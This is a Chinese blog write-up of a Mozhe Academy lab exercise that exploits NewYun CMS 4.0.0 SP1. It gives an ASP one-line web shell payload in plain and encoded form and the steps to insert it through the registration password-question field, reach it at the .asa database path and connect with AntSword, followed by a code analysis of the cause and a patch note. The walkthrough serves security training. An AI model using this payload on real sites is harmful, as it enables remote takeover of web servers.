欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

墨者学院-CMS系统漏洞分析溯源(第3题)

程序员文章站 2022-07-16 15:33:03
...

一.漏洞描述

在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell

二.影响版本

新云CMS 4.0.0 SP1

三.漏洞复现

1.使用御剑对域名进行探测
墨者学院-CMS系统漏洞分析溯源(第3题)
登录网址为http://219.153.49.228/login.asp
2.注册用户
在“密码问题”插入一句话木马
墨者学院-CMS系统漏洞分析溯源(第3题)

一句话木马为:
<% execute request(“a”)%>”
经过Erlang 中文简体字 GB2312 转 unicode 转换来的
墨者学院-CMS系统漏洞分析溯源(第3题)

┼攠數畣整爠煥敵瑳∨≡┩愾
3.检查木马是否上传成功
数据库的默认地址:data/ask_newasp.asa
在URL输入:http://219.153.49.228:46761/data/ask_newasp.asa
墨者学院-CMS系统漏洞分析溯源(第3题)

当出现该条语句时,就证明一句话木马上传成功
墨者学院-CMS系统漏洞分析溯源(第3题)

4.上传成功后连接蚁剑
基础配置如下:
墨者学院-CMS系统漏洞分析溯源(第3题)
墨者学院-CMS系统漏洞分析溯源(第3题)
成功连接
墨者学院-CMS系统漏洞分析溯源(第3题)

四.漏洞分析

此项漏洞形成原因,在注册用户处其他部分都做了字符校验,而问题回答做了MD5加密(失去了利用价值),唯有密码提问框变量question可直接存入了数据库中,在这套CMS系统的const.asp文件中有一个函数EncodeUtfSO,它的目的就是将一些数据(比如这里的密码提示问题)从Encode编码转换成Utf8,基于这种考虑
位于/inetpub/wwwroot/inc/const.asp
源码(使用JS把中文字符转换为UTF-8):

function EncodeUtf8(s1)
  {
      var s = escape(s1);
      var sa = s.split("%");
      var retV ="";
      if(sa[0] != "")
      {
         retV = sa[0];
      }
      for(var i = 1; i < sa.length; i ++)
      {
           if(sa[i].substring(0,1) == "u")
           {
               retV += Hex2Utf8(Str2Hex(sa[i].substring(1,5)));
                
           }
           else retV += "%" + sa[i];
      }
       
      return retV;
  }
  function Str2Hex(s)
  {
      var c = "";
      var n;
      var ss = "0123456789ABCDEF";
      var digS = "";
      for(var i = 0; i < s.length; i ++)
      {
         c = s.charAt(i);
         n = ss.indexOf(c);
         digS += Dec2Dig(eval(n));
            
      }
      //return value;
      return digS;
  }
  function Dec2Dig(n1)
  {
      var s = "";
      var n2 = 0;
      for(var i = 0; i < 4; i++)
      {
         n2 = Math.pow(2,3 - i);
         if(n1 >= n2)
         {
            s += '1';
            n1 = n1 - n2;
          }
         else
          s += '0';
           
      }
      return s;
       
  }
  function Dig2Dec(s)
  {
      var retV = 0;
      if(s.length == 4)
      {
          for(var i = 0; i < 4; i ++)
          {
              retV += eval(s.charAt(i)) * Math.pow(2, 3 - i);
          }
          return retV;
      }
      return -1;
  } 
  function Hex2Utf8(s)
  {
     var retS = "";
     var tempS = "";
     var ss = "";
     if(s.length == 16)
     {
         tempS = "1110" + s.substring(0, 4);
         tempS += "10" +  s.substring(4, 10); 
         tempS += "10" + s.substring(10,16); 
         var sss = "0123456789ABCDEF";
         for(var i = 0; i < 3; i ++)
         {
            retS += "%";
            ss = tempS.substring(i * 8, (eval(i)+1)*8);
             
             
             
            retS += sss.charAt(Dig2Dec(ss.substring(0,4)));
            retS += sss.charAt(Dig2Dec(ss.substring(4,8)));
         }
         return retS;
     }
     return "";
  } 

具体原理参考链接:http://www.520ve.com/2290.html

五.防御方法

升级版本打补丁

网络信息安全-ploto

相关标签: 渗透 安全